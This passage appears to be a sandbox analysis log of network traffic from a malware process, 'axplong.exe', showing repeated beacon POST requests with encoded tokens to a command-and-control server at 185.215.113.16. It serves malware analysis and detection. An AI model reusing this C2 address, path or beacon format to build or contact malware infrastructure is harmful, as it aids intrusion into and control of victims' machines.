                              Jul 26, 2024 20:59:19.123709917 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:19.375066996 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.649719185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:19.491379976 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:20.281785965 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:20.282890081 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:20.543345928 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.649720185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:20.663923979 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:21.412055016 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:21.415652037 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:21.671369076 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.649721185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:21.789062977 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:22.565438986 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:22.566241980 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:22.830981970 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.649722185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:22.946376085 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:23.721822977 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:23.722713947 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:23.971482038 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.649723185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:24.087443113 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:24.839623928 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:24.840555906 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:25.089128971 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.649724185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:25.211030006 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:26.012787104 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:25 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:26.013551950 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:26.261593103 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.649725185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:26.381644964 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:27.143990040 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:27.144716978 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:27.395840883 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.651099185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:27.506100893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:28.273273945 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:28.274797916 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:28.553694963 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.651101185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:28.665229082 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:29.438251019 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:29.439372063 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:29.691092014 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.651102185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:29.811546087 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:30.561515093 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:30 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:30.562540054 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:30.812402010 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:30 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.651104185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:30.933804989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:31.708218098 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:31.709012985 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:31.999113083 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.651106185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:32.115940094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:32.897625923 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
